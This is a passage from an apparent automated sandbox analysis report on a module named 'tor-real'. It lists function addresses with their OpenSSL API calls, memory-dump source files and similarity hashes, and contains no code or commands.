                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_ctrl$CipherInit_exR_flags
                                                                            • String ID: D$P
                                                                            • API String ID: 635281127-307317852
                                                                            • Opcode ID: 380afaa52c3c6faa75c1589fbd400fdaa4a086fb00e588c5981734c7726435e9
                                                                            • Instruction ID: 67ccb5993bab953ef3f8c2460778bdbbf965344ba0c584105fdd584a0de85556
                                                                            • Opcode Fuzzy Hash: 380afaa52c3c6faa75c1589fbd400fdaa4a086fb00e588c5981734c7726435e9
                                                                            • Instruction Fuzzy Hash: 8B11F2B014D7419FE3009F28D58434EFBE0AB84758F00891EE5A887790DBB9D5489F87
                                                                            Function 6C0D8900 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C0D05B0), ref: 6C0D8934
                                                                            • EVP_MD_CTX_copy_ex.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C0D05B0), ref: 6C0D8953
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_copy_exX_new
                                                                            • String ID: D$P$c
                                                                            • API String ID: 1626106133-3524198723
                                                                            • Opcode ID: 35ea065451d5ae145f1fd2334499f1e9f39e481b33dfb84e4e5b01540bc09ef7
                                                                            • Instruction ID: 1b1b7faef62d68169615810b48c98805927410d394c70dd169393214c6fe0725
                                                                            • Opcode Fuzzy Hash: 35ea065451d5ae145f1fd2334499f1e9f39e481b33dfb84e4e5b01540bc09ef7
                                                                            • Instruction Fuzzy Hash: 7A11E3B01093029BE700DF65C48474BBBE0AB88708F558A2DE8D89B645D77AE949DF93
                                                                            Function 6C0A0877 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C0A089B
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0A08B1
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0A08F5
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0950
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Digest$Init_exO_ctrlUpdateX_new
                                                                            • String ID: D$P
                                                                            • API String ID: 2441367972-307317852
                                                                            • Opcode ID: 5e6b5583970fb600a02d9f06ca29d2a2c751294da9b1ec6b12bf75b2e2b058c0
                                                                            • Instruction ID: 85da07b20cbe06092d5f9f94acd89092b3013d44ee7effe403e854bbf75d780b
                                                                            • Opcode Fuzzy Hash: 5e6b5583970fb600a02d9f06ca29d2a2c751294da9b1ec6b12bf75b2e2b058c0
                                                                            • Instruction Fuzzy Hash: A911D3B05087459FE340DFA5C48475BBBE0AF88348F11896DE8A99B716D738D4498F82
                                                                            Function 6C0A2040 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A2055
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A208D
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A22AB
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A22E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$L_sk_new_nullL_sk_push
                                                                            • String ID: A
                                                                            • API String ID: 1049000911-3554254475
                                                                            • Opcode ID: dc36121f1e6a0f9b68e5b737b697c728c0f2eac55d34112c3658abb5d43017ee
                                                                            • Instruction ID: e9e9cd1cb716d65b74f12ad717d6ae3bf56500abcf356b2261dca413831f2860
                                                                            • Opcode Fuzzy Hash: dc36121f1e6a0f9b68e5b737b697c728c0f2eac55d34112c3658abb5d43017ee
                                                                            • Instruction Fuzzy Hash: 02011BB150C301DFD7009FA6C44434ABBF0BB84348F00C92DE4D89BA51E7B9D5869F46
                                                                            Function 6C0A6C6B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_STORE_CTX_init.LIBCRYPTO-1_1 ref: 6C0A6B71
                                                                            • X509_STORE_CTX_set_flags.LIBCRYPTO-1_1 ref: 6C0A6B93
                                                                            • X509_verify_cert.LIBCRYPTO-1_1 ref: 6C0A6B9B
                                                                            • X509_STORE_CTX_get1_chain.LIBCRYPTO-1_1 ref: 6C0A6BB1
                                                                            • OPENSSL_sk_shift.LIBCRYPTO-1_1 ref: 6C0A6BBD
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6BC5
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6C31
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6C50
                                                                            • X509_STORE_CTX_new.LIBCRYPTO-1_1 ref: 6C0A6C73
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6CAD
                                                                            • X509_STORE_free.LIBCRYPTO-1_1 ref: 6C0A6D3D
                                                                            • X509_STORE_CTX_free.LIBCRYPTO-1_1 ref: 6C0A6D49
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_freeL_sk_numL_sk_pop_freeL_sk_shiftR_put_errorX509_freeX509_verify_certX_freeX_get1_chainX_initX_newX_set_flags
                                                                            • String ID: A
                                                                            • API String ID: 809722490-3554254475
                                                                            • Opcode ID: 3459272f376dc3c9bc2e1eb1b268769fef6e216afd1d650d30dfb35e4aa47a7e
                                                                            • Instruction ID: d582dcd21a0a038ec92a4dec1c4bace88255715e6e71eaef46ba19a3afa058dc
                                                                            • Opcode Fuzzy Hash: 3459272f376dc3c9bc2e1eb1b268769fef6e216afd1d650d30dfb35e4aa47a7e
                                                                            • Instruction Fuzzy Hash: D6F01D716483018FD7009FA9D48038EFBF0BB49348F11892DE5A89BB01D775E54A8B46
                                                                            Function 6C0A68D4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A6899
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A68A5
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A68B5
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A68FF
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A691F
                                                                            • OPENSSL_DIR_read.LIBCRYPTO-1_1 ref: 6C0A69E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_set_cmp_funcO_freeR_put_errorR_readX509_free__stack_chk_fail
                                                                            • String ID: A
                                                                            • API String ID: 4221723611-3554254475
                                                                            • Opcode ID: 87b19ac1e08c5a6215ae37127ab7912b0cec1aad134597e84dae8a29774f03ec
                                                                            • Instruction ID: 72682514bafc9d6153e3a5366895bee53ab82f1418db3b7834dc85ccbd42744f
                                                                            • Opcode Fuzzy Hash: 87b19ac1e08c5a6215ae37127ab7912b0cec1aad134597e84dae8a29774f03ec
                                                                            • Instruction Fuzzy Hash: 85F0C4B5A083058FD3449FA9C48065EFBF0BBC9318F94891DE4D8A7710C779A54A8F46
                                                                            Function 6C0D891C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C0D05B0), ref: 6C0D8934
                                                                            • EVP_MD_CTX_copy_ex.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,6C0D05B0), ref: 6C0D8953
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorX_copy_exX_new
                                                                            • String ID: D$P$j
                                                                            • API String ID: 2487396258-63814154
                                                                            • Opcode ID: 3eb69c83db7667db3a758ee08cd1e0c60a047e111eeec6159bab60b2d3b0a859
                                                                            • Instruction ID: 7271ff02cff95886260b6bf49bfb730cd42f631c1b60ca0357915ecd43bfafae
                                                                            • Opcode Fuzzy Hash: 3eb69c83db7667db3a758ee08cd1e0c60a047e111eeec6159bab60b2d3b0a859
                                                                            • Instruction Fuzzy Hash: D2F0AFB05093029AD7009F65C48434BBAE0AB88708F258A6DE8E89B645D775E9499B93
                                                                            Function 6C0B8C36 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_PKEY_cmp.LIBCRYPTO-1_1 ref: 6C0B8A51
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B8ACA
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B8B13
                                                                            • EVP_PKEY_missing_parameters.LIBCRYPTO-1_1 ref: 6C0B8C40
                                                                            • EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B8C58
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorY_cmpY_copy_parametersY_freeY_missing_parameters
                                                                            • String ID:
                                                                            • API String ID: 3141684548-0
                                                                            • Opcode ID: 58a15e70dd777c3d9b4967ff632d33aa89ea984b90d9826682e03d827a0adc2e
                                                                            • Instruction ID: 5b94be52045a8ff729ee7ca73952503ece55d39b90da8e6680cc30ac73c7b1ca
                                                                            • Opcode Fuzzy Hash: 58a15e70dd777c3d9b4967ff632d33aa89ea984b90d9826682e03d827a0adc2e
                                                                            • Instruction Fuzzy Hash: 1821E7B16493028FDB04DF29C480B5ABBF0BF88758F558A1EE498AB720D775E545CF42
                                                                            Function 6C0A6BE9 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A6BF7
                                                                              • Part of subcall function 6C0E67A0: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E6601
                                                                              • Part of subcall function 6C0E67A0: EVP_PKEY_security_bits.LIBCRYPTO-1_1 ref: 6C0E6616
                                                                              • Part of subcall function 6C0E67A0: X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0E6657
                                                                              • Part of subcall function 6C0E67A0: X509_get_signature_info.LIBCRYPTO-1_1 ref: 6C0E668B
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6C31
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6C50
                                                                            • X509_STORE_free.LIBCRYPTO-1_1 ref: 6C0A6D3D
                                                                            • X509_STORE_CTX_free.LIBCRYPTO-1_1 ref: 6C0A6D49
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6E81
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6E95
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_pop_freeX509_$E_freeL_sk_numL_sk_valueR_put_errorX509_get0_pubkeyX509_get_extension_flagsX509_get_signature_infoX_freeY_security_bits
                                                                            • String ID:
                                                                            • API String ID: 75647108-0
                                                                            • Opcode ID: 89e106c4e059398572617d16a03ec47e93e17b7283351664169101b2275ad626
                                                                            • Instruction ID: 5abe34edaa50c3be35bfdddb0395f6eb2769e27cc157c25a2ff56512041d804e
                                                                            • Opcode Fuzzy Hash: 89e106c4e059398572617d16a03ec47e93e17b7283351664169101b2275ad626
                                                                            • Instruction Fuzzy Hash: F611E5B1A493009FC700AFA9C08035EFBF0BB88758F518D2DE898C7701D775E8458B82
                                                                            Function 6C0A6456 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A647E
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A6486
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A649E
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A64B8
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A64D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                            • String ID:
                                                                            • API String ID: 2231116090-0
                                                                            • Opcode ID: d2edc8daeda3f4dd722285b17c10e7b147b40cc55a06d1bea8b1ccf4cdd5353b
                                                                            • Instruction ID: 2ae2268c4e48f6e7653c3cd81071b4ad8ecf1cf74f2728196741b043f14e69df
                                                                            • Opcode Fuzzy Hash: d2edc8daeda3f4dd722285b17c10e7b147b40cc55a06d1bea8b1ccf4cdd5353b
                                                                            • Instruction Fuzzy Hash: D20125B19097414FDB10AFB9A58079BBBF4BF48218F110C2DE595D7701E734E886CB81
                                                                            Function 6C0A64E6 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A650E
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A6516
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A652E
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A6548
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A6567
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                            • String ID:
                                                                            • API String ID: 2231116090-0
                                                                            • Opcode ID: 60384431fce171f9aa7aba0ba418e5281f5e348e3646d36aa3482e33ac7a654a
                                                                            • Instruction ID: 1345fc720736015ac99d2a67b3056415f59654c6a3ecc6e2cd58e551d4e9dec4
                                                                            • Opcode Fuzzy Hash: 60384431fce171f9aa7aba0ba418e5281f5e348e3646d36aa3482e33ac7a654a
                                                                            • Instruction Fuzzy Hash: 1B0175B1A097014FDB50AFB9A4C479BBBF0AF08218F16482CE4D9C7705E730E886CB41
                                                                            Function 6C0A6864 Relevance: 7.5, APIs: 5, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PEM_read_bio_X509.LIBCRYPTO-1_1 ref: 6C0A681F
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A6833
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A683F
                                                                            • OPENSSL_sk_find.LIBCRYPTO-1_1 ref: 6C0A6851
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A685D
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A686F
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A687F
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A6899
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A68A5
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A68B5
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A691F
                                                                            • OPENSSL_DIR_read.LIBCRYPTO-1_1 ref: 6C0A69E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
